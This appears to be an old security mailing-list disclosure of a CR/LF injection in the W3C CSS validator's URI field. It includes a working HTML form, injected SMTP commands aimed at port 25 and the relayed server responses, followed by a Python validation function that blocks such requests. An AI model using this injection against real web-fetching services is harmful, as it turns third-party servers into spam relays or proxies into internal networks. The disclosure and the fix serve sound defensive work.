Message-ID: <002f01c25c31$ab3ab720$e62d1c41@kc.rr.com>
From: mattmurphy at kc.rr.com (Matthew Murphy)
Subject: W3C CSS Validator -- Proxying Attack
Another vulnerability at the W3C, this time the CSS validator. A CR/LF
injection can be performed by creating a custom form:
<FORM METHOD="GET" ACTION="http://jigsaw.w3.org/css-validator/validator">
<INPUT TYPE="hidden" NAME="warning" VALUE="1">
<INPUT TYPE="hidden" NAME="profile" VALUE="css2">
Commands:
<TEXTAREA STYLE="width:300px;height:300px" NAME="uri"
ONDBLCLICK="document.forms(0).submit()"></TEXTAREA>
</FORM>
And filling it in with something like:
[Begin Form]
http://mailserver:25/
HELO 127.0.0.1
MAIL FROM:me@...e.com
RCPT TO:you@...ewhere.com
DATA
This is a simple message demonstrating the W3 relaying hole
.
QUIT
[End Form]
This results in:
GET /
502 Unknown Command
HELO 127.0.0.1
250 Welcome [138.96.249.65], pleased to meet you
MAIL FROM:me@...e.com
250 Sender "me@...e.com" OK...
RCPT TO:you@...ewhere.com
250 Recipient "you@...ewhere.com" OK...
DATA
354 Enter mail, end with "." on a line by itself
This is a simple message demonstrating the W3 relaying hole
.
250 Message accepted for delivery.
QUIT
221 Closing Session
If you relay this properly, the CSS validator will whine about the
connection being terminated by the peer (this happens immediately after the
SMTP command "QUIT" is sent). There is a 502 error in the logs from "GET
/", but that is really unavoidable.
"The reason the mainstream is thought
of as a stream is because it is
so shallow."
- Author Unknown
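The fix on the validator side is to refuse the user-supplied URI before fetching it. The check below is an added example written for this post, not the W3C validator's own code; the allowed-port set and the public-address rule are assumed policy, and it rejects both the CR/LF-separated SMTP lines and the port-25 target shown above.

```python
"""Server-side check for a user-supplied URI that a validator is about to
fetch on the user's behalf. Example code, not the W3C validator's own."""
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443, 8080}  # assumed policy; adjust to the deployment


def check_fetch_uri(uri: str) -> tuple[bool, str]:
    """Return (ok, reason); ok is False when the URI must not be fetched."""
    # 1. Any control character (CR, LF, NUL, ...) is a request-line or
    #    header injection attempt: the HELO/MAIL FROM lines in the post
    #    reach the peer only because CR/LF passes through unfiltered.
    #    Check the raw string first, since urlsplit() silently strips
    #    \r, \n and \t in current Python versions.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in uri):
        return False, "control character in URI"
    try:
        parts = urlsplit(uri)
    except ValueError as exc:
        return False, f"unparseable URI: {exc}"
    # 2. Only the schemes the validator actually needs.
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return False, "missing host"
    try:
        port = parts.port  # ValueError on a non-numeric port
    except ValueError:
        return False, "invalid port"
    if port is None:
        port = 443 if parts.scheme.lower() == "https" else 80
    # 3. A CSS validator has no business talking to port 25 (or any
    #    other non-web service); pin the reachable ports.
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    # 4. Refuse literal loopback/private targets so the fetcher cannot be
    #    pointed at services behind the validator host itself.
    try:
        addr = ipaddress.ip_address(parts.hostname)
        if addr.is_loopback or addr.is_private or addr.is_link_local:
            return False, "non-public address"
    except ValueError:
        pass  # a hostname; resolve-then-check belongs in the fetcher
    return True, "ok"
```

A hostname that resolves to an internal address is still caught only if the fetcher re-checks the resolved address, so step 4 is a filter on literals, not a complete SSRF defence.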